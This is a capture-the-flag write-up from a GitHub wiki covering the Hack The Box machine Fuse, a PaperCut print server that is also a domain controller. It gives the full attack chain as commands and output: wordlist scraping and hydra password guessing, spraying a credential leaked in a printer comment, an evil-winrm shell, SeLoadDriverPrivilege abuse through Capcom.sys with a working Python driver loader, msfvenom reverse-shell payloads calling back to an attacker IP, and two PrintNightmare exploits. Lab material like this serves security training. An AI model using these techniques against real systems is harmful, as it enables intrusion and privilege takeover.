HTB Fuse - lmiyasato/lenny-hacking GitHub Wiki
Hack the Box - Fuse
Fuse is built around a PaperCut print server that also runs as the domain controller (I will throw in the PrintNightmare exploits at the end for more fun and giggles).
Skills used
- Enumeration
- SMB
- Website Scraping (for password list generation)
- Password Spraying
- Privilege Abuse (SeLoadDriverPrivilege)
- PowerShell (Evil-WinRM)
- Privilege Escalation (SeLoadDriverPrivilege, PrintNightmare)
Enumeration / Initial Access
Nmap / Port Scanning
Tool used: nmap - World's most well known port scanner.
Run an nmap scan (normally start with all ports, but will use the known open ports for brevity)
kali@kali:~/Documents/HTB/fuse$ nmap -n -p 53,80,88,135,139,445,464,593,636,3268,3269,5985 -Pn -vvv 10.10.10.193 -oN nmap.fuse2
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-30 18:37 EDT
Initiating Connect Scan at 18:37
Scanning 10.10.10.193 [12 ports]
Discovered open port 139/tcp on 10.10.10.193
Discovered open port 445/tcp on 10.10.10.193
Discovered open port 135/tcp on 10.10.10.193
Discovered open port 80/tcp on 10.10.10.193
Discovered open port 53/tcp on 10.10.10.193
Discovered open port 3269/tcp on 10.10.10.193
Discovered open port 636/tcp on 10.10.10.193
Discovered open port 593/tcp on 10.10.10.193
Discovered open port 464/tcp on 10.10.10.193
Discovered open port 88/tcp on 10.10.10.193
Discovered open port 5985/tcp on 10.10.10.193
Discovered open port 3268/tcp on 10.10.10.193
Completed Connect Scan at 18:37, 0.34s elapsed (12 total ports)
Nmap scan report for 10.10.10.193
Host is up, received user-set (0.17s latency).
Scanned at 2021-07-30 18:37:20 EDT for 1s
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5985/tcp open wsman syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds
SMB - TCP/445
Tool used: crackmapexec - linux based tool to assess active directory based networks. Tool abuses built-in active directory features & protocols to evade endpoint protection & IDS/IPS tools.
Using this tool allows enumeration of the OS and domain
kali@kali:~/Documents/HTB/fuse$ crackmapexec smb 10.10.10.193
SMB 10.10.10.193 445 FUSE [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)
Tool used: smbmap - linux based tool for smb enumeration.
The first run, with no credentials, attempts a null (unauthenticated) session and lists no accessible shares; the second, which passes the literal user name "null" with no password, is rejected outright. Either way, anonymous access will not get you into any share, which is good. The -H switch tells the tool which host to scan (10.10.10.193) and the -u switch supplies the user name to authenticate with.
kali@kali:~/Documents/HTB/fuse$ smbmap -H 10.10.10.193
[+] IP: 10.10.10.193:445 Name: 10.10.10.193
kali@kali:~/Documents/HTB/fuse$ smbmap -H 10.10.10.193 -u null
[!] Authentication error on 10.10.10.193
Website - TCP/80
Browsing directly to 10.10.10.193 returns a 200 ("OK"), but the body is only a meta-refresh redirect to http://fuse.fabricorp.local:
kali@kali:~/Documents/HTB/fuse$ wget -q -O - http://10.10.10.193
<meta http-equiv="refresh" content="0; url=http://fuse.fabricorp.local/papercut/logs/html/index.htm" />
Modify your /etc/hosts file to map 10.10.10.193 to fuse.fabricorp.local and fabricorp.local (several commands later in this write-up use the short name fuse.htb as well, so add that to the same line).
Visiting fuse.fabricorp.local (the redirect target) will bring up the PaperCut print logger webpage. (pic 1)
The log pages list every print job along with the user name that submitted it. From those names, build a user list (users.txt):
pmerton
tlavel
sthompson
bhult
administrator
Password Spraying / Guessing
Password spraying, strictly speaking, tries one (or a handful of) commonly used passwords against a large number of accounts, which keeps every account under the lockout threshold. Here there are only five accounts to work with, so instead a custom password list scraped from the web page will be tried against each of them. That is closer to a dictionary attack than a spray, so on a real engagement check the domain lockout policy first (threshold and observation window, e.g. with crackmapexec's --pass-pol) before firing 170 guesses at each account.
Tool used: cewl - a custom wordlist generator that scrapes a website for words.
The --with-numbers switch tells the tool to keep words that contain digits (such as Fabricorp01) rather than letters-only words.
kali@kali:~/Documents/HTB/fuse$ cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers > wordlist
Tool used: hydra - multiprotocol password cracker used with wordlist. Protocols include http, ftp, ldap, and much more!
The -L switch uses users.txt as the list of users to try and the -P switch uses the wordlist just created as the list of passwords. The -I switch ignores any existing restore file and starts immediately. For verbose output, add the -v switch as well. This part will take about 2 minutes for the first cracked password.
kali@kali:~/Documents/HTB/fuse$ hydra -I -L users.txt -P wordlist 10.10.10.193 smb
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-30 19:43:15
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 850 login tries (l:5/p:170), ~850 tries per task
[DATA] attacking smb://10.10.10.193:445/
[STATUS] 116.00 tries/min, 116 tries in 00:01h, 734 to do in 00:07h, 1 active
[445][smb] Host: 10.10.10.193 Account: tlavel Valid password, password expired and must be changed on next logon
[445][smb] host: 10.10.10.193 login: tlavel password: Fabricorp01
[STATUS] 136.33 tries/min, 409 tries in 00:03h, 441 to do in 00:04h, 1 active
[445][smb] Host: 10.10.10.193 Account: bhult Valid password, password expired and must be changed on next logon
[445][smb] host: 10.10.10.193 login: bhult password: Fabricorp01
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-30 19:49:33
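To make the cewl step and the lockout caveat concrete, here is an added example (not part of the original write-up, and not cewl's or hydra's own code) that tokenizes a page the way cewl --with-numbers does and then chunks the resulting wordlist into rounds that stay under a given lockout threshold. SAMPLE_HTML is a constructed stand-in for the PaperCut log page; the user names and the Fabricorp01 token in it are taken from this write-up, everything else is made up.

```python
"""Scrape a password wordlist from a print-log page the way cewl --with-numbers
does, and chunk it into lockout-safe spray rounds. Added example, not part of
the original write-up; SAMPLE_HTML is a constructed stand-in for the PaperCut
page (user names and the Fabricorp01 token come from the write-up)."""
import re
from html.parser import HTMLParser

SAMPLE_HTML = """<html><head><title>PaperCut Print Logger</title>
<script>var tracker = "scripttoken";</script></head>
<body><h1>Fabricorp01 print log</h1>
<table><tr><th>Time</th><th>User</th><th>Document</th></tr>
<tr><td>2020-05-28 10:01</td><td>pmerton</td><td>Q3 Budget.xlsx</td></tr>
<tr><td>2020-05-28 10:02</td><td>tlavel</td><td>Fabricorp01 onboarding.docx</td></tr>
</table></body></html>"""


class _VisibleText(HTMLParser):
    """Collect text nodes, skipping <script>/<style> bodies like cewl does."""

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def extract_words(html, with_numbers=False, min_len=3):
    """cewl-style tokens: letters only by default, letters and digits with
    with_numbers (so 'Fabricorp01' survives instead of collapsing to
    'Fabricorp'). First-appearance order is kept and duplicates are dropped."""
    parser = _VisibleText()
    parser.feed(html)
    token_re = r"[A-Za-z0-9]+" if with_numbers else r"[A-Za-z]+"
    seen, words = set(), []
    for tok in re.findall(token_re, " ".join(parser.chunks)):
        if len(tok) >= min_len and tok not in seen:
            seen.add(tok)
            words.append(tok)
    return words


def spray_rounds(passwords, lockout_threshold, safety_margin=1):
    """Split the list so each account sees at most (threshold - margin)
    guesses per round; wait one lockout observation window between rounds.
    A threshold of 0 means the domain never locks accounts out."""
    if lockout_threshold <= 0:
        return [list(passwords)]
    per_round = max(1, lockout_threshold - safety_margin)
    return [list(passwords[i:i + per_round])
            for i in range(0, len(passwords), per_round)]


if __name__ == "__main__":
    words = extract_words(SAMPLE_HTML, with_numbers=True)
    print(len(words), "candidates:", words)
    for n, batch in enumerate(spray_rounds(words, lockout_threshold=5), 1):
        print(f"round {n}: {batch}")
```

Without with_numbers the token Fabricorp01 collapses to Fabricorp, which is exactly why the cewl run above needed that switch. The round size comes from the lockout threshold you read off the domain policy; with a threshold of 5, the 170-word list above becomes 43 rounds of 4, each separated by one observation window.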
Gaining initial access
Users tlavel and bhult seem to have an initial (default) password of Fabricorp01. From looking at the hydra logs, it also shows that the password expired and must be changed on the next logon.
Will use smbmap to gain initial access:
kali@kali:~/Documents/HTB/fuse$ smbmap -u tlavel -p Fabricorp01 -H 10.10.10.193
[!] Authentication error on 10.10.10.193
kali@kali:~/Documents/HTB/fuse$ smbmap -u bhult -p Fabricorp01 -H 10.10.10.193
[!] Authentication error on 10.10.10.193
Tool used: smbclient - command line client to access SMB/CIFS resources on servers, similar to smbmap, part of samba suite
This will show that the "User must change password at next logon" flag is set on the account:
kali@kali:~/Documents/HTB/fuse$ smbclient -L fuse.htb -U bhult
Enter WORKGROUP\bhult password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
Tool used: smbpasswd - command line client to change the password used for SMB sessions, part of the Samba suite.
Perhaps changing the password will help. Note that this modifies a credential on the target (the user can no longer log in with the old password), so on a real engagement get explicit authorization and record the change. Here tlavel's password is set to Password123:
kali@kali:~/Documents/HTB/fuse$ sudo smbpasswd -r 10.10.10.193 -U tlavel
[sudo] password for kali:
Old SMB password:
New SMB password: *** Set to Password123 ***
Retype new SMB password:
Password changed for user tlavel on 10.10.10.193.
Tool used: rpcclient - command line tool initially developed to test MS-RPC functionality in Samba itself. It has undergone several stages of development and stability. Many system administrators have now written scripts around it to manage Windows NT clients from their UNIX workstation.
Use rpcclient to gain a connection to the system for further enumeration:
kali@kali:~/Documents/HTB/fuse$ rpcclient -U FABRICORP\\tlavel fuse.htb
Enter FABRICORP\tlavel's password:
rpcclient $>
From here, we can enumerate the system further to gain more information:
rpcclient $> querydispinfo
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x109c RID: 0x1db2 acb: 0x00000210 Account: astein Name: (null) Desc: (null)
index: 0x1099 RID: 0x1bbd acb: 0x00020010 Account: bhult Name: (null) Desc: (null)
index: 0x1092 RID: 0x451 acb: 0x00020010 Account: bnielson Name: (null) Desc: (null)
index: 0x109a RID: 0x1bbe acb: 0x00000211 Account: dandrews Name: (null) Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0x109d RID: 0x1db3 acb: 0x00000210 Account: dmuir Name: (null) Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xff4 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x109b RID: 0x1db1 acb: 0x00000210 Account: mberbatov Name: (null) Desc: (null)
index: 0x1096 RID: 0x643 acb: 0x00000210 Account: pmerton Name: (null) Desc: (null)
index: 0x1094 RID: 0x641 acb: 0x00000210 Account: sthompson Name: (null) Desc: (null)
index: 0x1091 RID: 0x450 acb: 0x00000210 Account: svc-print Name: (null) Desc: (null)
index: 0x1098 RID: 0x645 acb: 0x00000210 Account: svc-scan Name: (null) Desc: (null)
index: 0x1095 RID: 0x642 acb: 0x00020010 Account: tlavel Name: (null) Desc: (null)
Take the output, put it in a file (users2.txt), and strip out just the account names with the following (the fifth colon-separated field is "<account> Name", so awk keeps its first word). The acb column is also worth a look: it is the SAMR account-control bitmask. 0x00000210 is a normal account whose password never expires, 0x00020010 (bhult, bnielson, tlavel) has the password-expired bit (0x20000) set, and a set low bit 0x1 (dandrews, Guest, DefaultAccount, krbtgt) means the account is disabled and not worth spraying.
cat users2.txt | cut -d ':' -f 5 | awk '{print $1}'
Given the theme of this box, it would make sense to enumerate the printers as well.
kali@kali:~/Documents/HTB/fuse$ rpcclient -U FABRICORP\\bhult 10.10.10.193
Note: the prompt below shows bhult, but bhult's password is still expired; use tlavel's account with the new password Password123 set above, which is known to work.
Enter FABRICORP\bhult's password:
rpcclient $> enumprinters
flags:[0x800000]
name:[\\10.10.10.193\HP-MFT01]
description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]
Tool used: crackmapexec (introduced above) - here used to spray the recovered password across the full user list (users3.txt, the names parsed out of querydispinfo).
From the description, it looks like an administrator put the "scan2docs" password, $fab@s3Rv1ce$1, in the printer's comment field. Since it is a service-account password there is a fair chance it has been reused for other service accounts. Spraying it across the user list shows that the svc-print and svc-scan accounts both use the scan2docs password.
kali@kali:~/Documents/HTB/fuse$ crackmapexec smb 10.10.10.193 -u users3.txt -p '$fab@s3Rv1ce$1' --continue-on-success
SMB 10.10.10.193 445 FUSE [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\Administrator:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\Guest:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\krbtgt:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\DefaultAccount:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [+] fabricorp.local\svc-print:$fab@s3Rv1ce$1
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\bnielson:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\sthompson:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\tlavel:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\pmerton:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [+] fabricorp.local\svc-scan:$fab@s3Rv1ce$1
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\bhult:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\dandrews:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\mberbatov:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\astein:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\dmuir:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
Tool used: Evil WinRM - the ultimate WinRM shell for hacking/pentesting. WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol
Now to use evil-winrm to open a shell with user access.
kali@kali:~/Documents/HTB/fuse$ evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-print\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-print> cd desktop
*Evil-WinRM* PS C:\Users\svc-print\desktop> cat user.txt
db0a897cb4a1d0705f145c54694827c3
Detection from enumeration
- Know what executables are executed on the system and what they do.
- Enumeration is not limited to Nmap or network scanning tools. Enumeration is basically information gathering such as a list of users, administrators, groups, etc. Information gathering is critical for a hacker so they have an understanding what they will need to break into the target system. Enumeration can also be easily done with Powershell, Python, and built-in operating system tools.
Privilege Escalation to SYSTEM
Do a quick "whoami /priv" to find out what privileges svc-print has.
*Evil-WinRM* PS C:\Users\svc-print\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
The svc-print account has the SeLoadDriverPrivilege privilege. Accounts with the "Load and unload device drivers" privilege can load an arbitrary kernel driver, and loading a known-vulnerable signed driver (Capcom.sys here) and then exploiting it yields SYSTEM. This works on this Server 2016 build because nothing stops the driver from loading; on current Windows builds Capcom.sys is on Microsoft's vulnerable driver blocklist and HVCI-enabled systems refuse to load it. More information can be found in this article: https://www.tarlogic.com/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
Also, more in-depth privilege abuse information can be found in this slide deck: https://2018.romhack.io/slides/RomHack%202018%20-%20Andrea%20Pierini%20-%20whoami%20priv%20-%20show%20me%20your%20Windows%20privileges%20and%20I%20will%20lead%20you%20to%20SYSTEM.pdf
And even more, to simplify this, pre-compiled executables can be found here (but you will have to build your own shell.exe): https://github.com/mach1el/htb-scripts/tree/master/exploit-fuse
Create your shell.exe, which is basically a reverse TCP shell. Note that windows/x64/meterpreter/reverse_tcp is a staged payload and needs a Metasploit multi/handler to complete the stage; the plain nc listener used below cannot catch it. Use the stageless windows/x64/shell_reverse_tcp instead if nc is the listener. The nc.exe and netcat.bat uploaded below are the alternative that nc does catch, and the cmd.exe banner in the SYSTEM shell at the end of this section shows that route is the one that produced it.
kali@kali:~/Documents/HTB/fuse/EoPLoadDriver$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.52 LPORT=999 -f exe -o shell.exe
Within the Evil-WinRM shell, upload the contents from the GitHub repo with the pre-compiled executables. The transcript below runs from C:\Users\svc-print\Documents, so the files land there; the exploit step that follows expects them in C:\temp, so either cd to C:\temp before uploading or move the files there afterwards:
*Evil-WinRM* PS C:\Users\svc-print\Documents> upload Capcom.sys
Info: Uploading Capcom.sys to C:\Users\svc-print\Documents\Capcom.sys
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-print\Documents> upload EOPLOADDRIVER.exe
Info: Uploading EOPLOADDRIVER.exe to C:\Users\svc-print\Documents\EOPLOADDRIVER.exe
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-print\Documents> upload ExploitCapcom_modded.exe
Info: Uploading ExploitCapcom_modded.exe to C:\Users\svc-print\Documents\ExploitCapcom_modded.exe
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-print\Documents> upload nc.exe
Info: Uploading nc.exe to C:\Users\svc-print\Documents\nc.exe
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-print\Documents> upload netcat.bat
Info: Uploading netcat.bat to C:\Users\svc-print\Documents\netcat.bat
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-print\Documents> upload shell.exe
Info: Uploading shell.exe to C:\Users\svc-print\Documents\shell.exe
Info: Upload successful!
Within the C:\temp directory (where Capcom.sys must now reside, since that path is passed on the command line), run the following command. The first argument is the registry path, relative to HKCU, under which the tool registers the driver service; the second is the driver file:
.\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\Capcom.sys
*Evil-WinRM* PS C:\temp> .\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\Capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: 00000000, WinError: 0
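For anyone who wants to see what EOPLOADDRIVER.exe is actually doing rather than run a binary from someone else's repo, here is an added example in Python (not the tool from the linked repository, and not part of the original write-up). It registers the driver service under the caller's own hive (HKCU, which the kernel names \Registry\User\<SID>, exactly the path printed in the output above), enables SeLoadDriverPrivilege on its own token and calls NtLoadDriver. The driver path C:\temp\Capcom.sys and the service name MyService are taken from the command above; reading the SID from whoami /user is this example's own choice. The pure helpers run anywhere; load_driver() needs Windows, the privilege, and the driver file in place.

```python
"""What EOPLOADDRIVER.exe does, in Python: register a driver service under the
caller's own hive (HKCU, which the kernel names \\Registry\\User\\<SID>) and call
NtLoadDriver on it, which SeLoadDriverPrivilege permits. Added example, not the
tool from the linked repository. The pure helpers run anywhere; load_driver()
needs Windows, the privilege, and a driver file at the path given."""
import sys
import ctypes

SERVICE_KERNEL_DRIVER = 1        # Type value for a kernel-mode driver service
SE_PRIVILEGE_ENABLED = 0x00000002
TOKEN_ADJUST_PRIVILEGES = 0x0020
TOKEN_QUERY = 0x0008


def service_values(driver_path):
    """Registry values the I/O manager needs; ImagePath uses the NT \\??\\ prefix."""
    return {"ImagePath": "\\??\\" + driver_path, "Type": SERVICE_KERNEL_DRIVER}


def nt_registry_path(sid, service):
    """HKCU\\System\\CurrentControlSet\\<service> spelled the way NtLoadDriver expects."""
    return f"\\Registry\\User\\{sid}\\System\\CurrentControlSet\\{service}"


def ntstatus_hex(status):
    """NtLoadDriver returns a signed LONG; show it in the familiar C0000xxx form."""
    return f"{status & 0xFFFFFFFF:08X}"


def enable_privilege(name):
    """AdjustTokenPrivileges on our own token; raises if the privilege is not held."""
    advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)

    class LUID(ctypes.Structure):
        _fields_ = [("LowPart", ctypes.c_ulong), ("HighPart", ctypes.c_long)]

    class TOKEN_PRIVILEGES(ctypes.Structure):
        _fields_ = [("PrivilegeCount", ctypes.c_ulong),
                    ("Luid", LUID), ("Attributes", ctypes.c_ulong)]

    kernel32.GetCurrentProcess.restype = ctypes.c_void_p
    advapi32.OpenProcessToken.argtypes = [ctypes.c_void_p, ctypes.c_ulong,
                                          ctypes.POINTER(ctypes.c_void_p)]
    advapi32.AdjustTokenPrivileges.argtypes = [
        ctypes.c_void_p, ctypes.c_int, ctypes.POINTER(TOKEN_PRIVILEGES),
        ctypes.c_ulong, ctypes.c_void_p, ctypes.c_void_p]
    token = ctypes.c_void_p()
    if not advapi32.OpenProcessToken(kernel32.GetCurrentProcess(),
                                     TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
                                     ctypes.byref(token)):
        raise ctypes.WinError(ctypes.get_last_error())
    tp = TOKEN_PRIVILEGES(1, LUID(), SE_PRIVILEGE_ENABLED)
    if not advapi32.LookupPrivilegeValueW(None, name, ctypes.byref(tp.Luid)):
        raise ctypes.WinError(ctypes.get_last_error())
    advapi32.AdjustTokenPrivileges(token, 0, ctypes.byref(tp), 0, None, None)
    # The call returns TRUE even when nothing was assigned; the last error tells.
    if ctypes.get_last_error() != 0:   # 1300 == ERROR_NOT_ALL_ASSIGNED
        raise ctypes.WinError(ctypes.get_last_error())


def load_driver(driver_path, service="MyService"):
    """Create the service key under HKCU and load the driver; returns the NTSTATUS."""
    import subprocess
    import winreg
    # SID of the current token's user, last field of "whoami /user" (example's choice)
    sid = subprocess.check_output(["whoami", "/user"], text=True).split()[-1]
    with winreg.CreateKey(winreg.HKEY_CURRENT_USER,
                          f"System\\CurrentControlSet\\{service}") as key:
        values = service_values(driver_path)
        winreg.SetValueEx(key, "ImagePath", 0, winreg.REG_EXPAND_SZ, values["ImagePath"])
        winreg.SetValueEx(key, "Type", 0, winreg.REG_DWORD, values["Type"])
    enable_privilege("SeLoadDriverPrivilege")

    class UNICODE_STRING(ctypes.Structure):
        _fields_ = [("Length", ctypes.c_ushort), ("MaximumLength", ctypes.c_ushort),
                    ("Buffer", ctypes.c_wchar_p)]

    path = nt_registry_path(sid, service)
    ustr = UNICODE_STRING(len(path) * 2, (len(path) + 1) * 2, path)
    ntdll = ctypes.WinDLL("ntdll")
    ntdll.NtLoadDriver.argtypes = [ctypes.POINTER(UNICODE_STRING)]
    ntdll.NtLoadDriver.restype = ctypes.c_long
    return ntdll.NtLoadDriver(ctypes.byref(ustr))


if __name__ == "__main__" and sys.platform == "win32":
    print("NTSTATUS:", ntstatus_hex(load_driver(r"C:\temp\Capcom.sys")))
```

An NTSTATUS of 00000000 means the driver is loaded, as in the output above. The defensive takeaway is the same as for the tool: a service key appearing under HKU\<SID>\System\CurrentControlSet, followed by an image-load event for a driver from a user-writable directory, is the signature to hunt for.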
Run the listener with the following command:
sudo nc -nvlp 999
Then run the ExploitCapcom_modded.exe command
*Evil-WinRM* PS C:\temp> .\ExploitCapcom_modded.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000080
[*] Shellcode was placed at 00000140C54C0008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program
From here, you should get your system shell!
[sudo] password for kali:
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::999
Ncat: Listening on 0.0.0.0:999
Ncat: Connection from 10.10.10.193.
Ncat: Connection from 10.10.10.193:51176.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\temp>whoami
whoami
nt authority\system
Bonus 1: Using the print nightmare for privilege escalation (CVE-2021-1675)
Print Nightmare (Local Privilege Escalation Version / CVE-2021-1675):
Reference site: https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html
Download the PowerShell source code (CVE-2021-1675.ps1), upload it to the target box with Evil-WinRM, and run the following commands:
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser Lenny1 -NewPassword Password1
evil-winrm -i 10.10.10.193 -u Lenny1 -p Password1
From here, Evil-WinRM was used to log in as the new user "Lenny1". Because Fuse is a domain controller there are no true local accounts: net localgroup administrators lists the domain's built-in Administrators group, and Lenny1 has been added to it:
*Evil-WinRM* PS C:\Users\Lenny1\Documents> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
badguy
Domain Admins
Enterprise Admins
Lenny1
oki
The command completed successfully.
*Evil-WinRM* PS C:\Users\Lenny1\Documents>
Bonus 2: Using the print nightmare for privilege escalation - Remote Code Execution (CVE-2021-34527)
This is also a PrintNightmare privilege escalation, but via the remote code execution variant: an authenticated domain user adds a printer driver whose DLL is fetched from an SMB share and loaded by spoolsv.exe, which runs as SYSTEM.
Reference site: https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527
The compromised box will be used as the SMB server for the purposes of this demo. For some reason, I can't get the SMB server on my Kali box to work anonymously.
With the previous exploitation from print nightmare #1, I will create a share:
net share temp=C:\temp /grant:everyone,FULL
Create the evil DLL with msfvenom and upload it to C:\temp on the target (the directory shared as temp above):
msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=10.10.14.52 LPORT=666 -o evildll.dll
Download the Python script from the reference site, and install/re-install impacket if necessary.
Open a reverse shell listener listening on port 666:
sudo nc -nvlp 666
Use the python script as follows:
kali@kali:~/Documents/tools/print_nightmare/CVE-2021-34527/PrintNightmare-CVE-2021-34527$ sudo python3 CVE-2021-34527.py svc-print:'$fab@s3Rv1ce$1'@fuse.htb '\\10.10.10.193\temp\evildll.dll'
Enjoy shell!
kali@kali:~/Documents/tools/print_nightmare/CVE-2021-34527/PrintNightmare-CVE-2021-34527$ sudo nc -nvlp 666
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::666
Ncat: Listening on 0.0.0.0:666
Ncat: Connection from 10.10.10.193.
Ncat: Connection from 10.10.10.193:50371.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system